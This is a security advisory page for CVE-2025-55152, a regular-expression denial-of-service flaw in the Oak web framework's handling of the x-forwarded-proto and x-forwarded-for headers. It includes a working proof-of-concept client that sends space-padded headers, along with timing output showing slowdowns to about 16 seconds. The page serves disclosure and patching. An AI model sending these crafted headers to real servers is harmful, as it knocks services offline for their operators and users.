GHSA-R3V7-PC4G-7XP9

Vulnerability from github – Published: 2025-08-12 00:15 – Updated: 2025-08-12 00:15
VLAI?
Summary
Oak Server has ReDoS in x-forwarded-proto and x-forwarded-for headers
Details

Summary

With specially crafted value of the x-forwarded-proto or x-forwarded-for headers, it's possible to significantly slow down an oak server.

Vulnerable Code

  • https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L87
  • https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L142

PoC

  • setup
deno --version
deno 2.4.3
v8 13.7.152.14-rusty
typescript 5.8.3
  • server.ts
import { Application } from "https://deno.land/x/oak/mod.ts";

const app = new Application({proxy: true});

let i = 1

app.use((ctx) => {

    // let url = ctx.request.url   // test1) x-forwarded-proto
    let ips = ctx.request.ips   // test2) x-forwarded-for
    console.log(`request ${i} received`)
    i++;
    ctx.response.body = "hello";
});

await app.listen({ port: 8080 });
  • client.ts
const lengths = [2000, 4000, 8000, 16000, 32000, 64000, 128000]

const data1 = lengths.map(l => 'A' + 'A'.repeat(l) + 'A');
const data2 = lengths.map(l => 'A' + ' '.repeat(l) + 'A');

async function run(data) {
    for (let i = 0; i < data.length; i++) {
        let d = data[i];

        const start = performance.now();

        await fetch("http://localhost:8080", {
            headers: {
                // "x-forwarded-proto": d,  // test1)
                "x-forwarded-for": d,    // test2)
            },
        });

        const end = performance.now();
        console.log('length=%d, time=%d ms', d.length, end - start);
    }
}

console.log("\n[+] Test normal behavior")
await run(data1)
console.log("\n[+] Test payloads")
await run(data2)
  • run
deno run --allow-net server.ts
deno run --allow-net client.ts

[+] Test normal behavior
length=2002, time=14 ms
length=4002, time=6 ms
length=8002, time=3 ms
length=16002, time=3 ms
length=32002, time=2 ms
length=64002, time=4 ms
length=128002, time=3 ms

[+] Test payloads
length=2002, time=7 ms
length=4002, time=22 ms
length=8002, time=77 ms
length=16002, time=241 ms
length=32002, time=947 ms
length=64002, time=4020 ms
length=128002, time=15840 ms

Impact

A specially crafted value of the x-forwarded-proto or x-forwarded-for headers  can be used to significantly slow down an oak server.

Similar Issues

  • https://github.com/denoland/deno/security/advisories/GHSA-jc97-h3h9-7xh6
    • https://github.com/denoland/deno/pull/17722
  • https://github.com/websockets/ws/security/advisories/GHSA-6fc8-4gx4-v693
    • https://github.com/websockets/ws/commit/00c425ec77993773d823f018f64a5c44e17023ff
Severity ?
5.3 (Medium)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@oakserver/oak"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "14.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-55152"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-08-12T00:15:00Z",
    "nvd_published_at": "2025-08-09T02:15:38Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nWith specially crafted value of the\u00a0`x-forwarded-proto` or `x-forwarded-for` headers, it\u0027s possible\u00a0to significantly slow down an oak server.\n\n### Vulnerable Code\n\n- https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L87\n- https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L142\n\n### PoC\n\n- setup\n```\ndeno --version\ndeno 2.4.3\nv8 13.7.152.14-rusty\ntypescript 5.8.3\n```\n\n- `server.ts`\n```ts\nimport { Application } from \"https://deno.land/x/oak/mod.ts\";\n\nconst app = new Application({proxy: true});\n\nlet i = 1\n\napp.use((ctx) =\u003e {\n\n    // let url = ctx.request.url   // test1) x-forwarded-proto\n    let ips = ctx.request.ips   // test2) x-forwarded-for\n    console.log(`request ${i} received`)\n    i++;\n    ctx.response.body = \"hello\";\n});\n\nawait app.listen({ port: 8080 });\n```\n\n- `client.ts`\n```ts\nconst lengths = [2000, 4000, 8000, 16000, 32000, 64000, 128000]\n\nconst data1 = lengths.map(l =\u003e \u0027A\u0027 + \u0027A\u0027.repeat(l) + \u0027A\u0027);\nconst data2 = lengths.map(l =\u003e \u0027A\u0027 + \u0027 \u0027.repeat(l) + \u0027A\u0027);\n\nasync function run(data) {\n    for (let i = 0; i \u003c data.length; i++) {\n        let d = data[i];\n        \n        const start = performance.now();\n\n        await fetch(\"http://localhost:8080\", {\n            headers: {\n                // \"x-forwarded-proto\": d,  // test1)\n                \"x-forwarded-for\": d,    // test2)\n            },\n        });\n\n        const end = performance.now();\n        console.log(\u0027length=%d, time=%d ms\u0027, d.length, end - start);\n    }\n}\n\nconsole.log(\"\\n[+] Test normal behavior\")\nawait run(data1)\nconsole.log(\"\\n[+] Test payloads\")\nawait run(data2)\n```\n\n- run\n```\ndeno run --allow-net server.ts\ndeno run --allow-net client.ts\n\n[+] Test normal behavior\nlength=2002, time=14 ms\nlength=4002, time=6 ms\nlength=8002, time=3 ms\nlength=16002, time=3 ms\nlength=32002, time=2 ms\nlength=64002, time=4 ms\nlength=128002, time=3 ms\n\n[+] Test payloads\nlength=2002, time=7 ms\nlength=4002, time=22 ms\nlength=8002, time=77 ms\nlength=16002, time=241 ms\nlength=32002, time=947 ms\nlength=64002, time=4020 ms\nlength=128002, time=15840 ms\n```\n\n\n### Impact\n\nA specially crafted value of the\u00a0`x-forwarded-proto` or `x-forwarded-for` headers\u00a0 can be used to significantly slow down an oak server.\n\n### Similar Issues\n\n- https://github.com/denoland/deno/security/advisories/GHSA-jc97-h3h9-7xh6\n\t- https://github.com/denoland/deno/pull/17722\n- https://github.com/websockets/ws/security/advisories/GHSA-6fc8-4gx4-v693\n\t- https://github.com/websockets/ws/commit/00c425ec77993773d823f018f64a5c44e17023ff",
  "id": "GHSA-r3v7-pc4g-7xp9",
  "modified": "2025-08-12T00:15:00Z",
  "published": "2025-08-12T00:15:00Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/oakserver/oak/security/advisories/GHSA-r3v7-pc4g-7xp9"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55152"
    },
    {
      "type": "WEB",
      "url": "https://github.com/oakserver/oak/commit/b60e60330ef227707c4dc13ef0ea36192d894f44"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/oakserver/oak"
    },
    {
      "type": "WEB",
      "url": "https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L142"
    },
    {
      "type": "WEB",
      "url": "https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L87"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Oak Server has ReDoS in x-forwarded-proto and x-forwarded-for headers"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.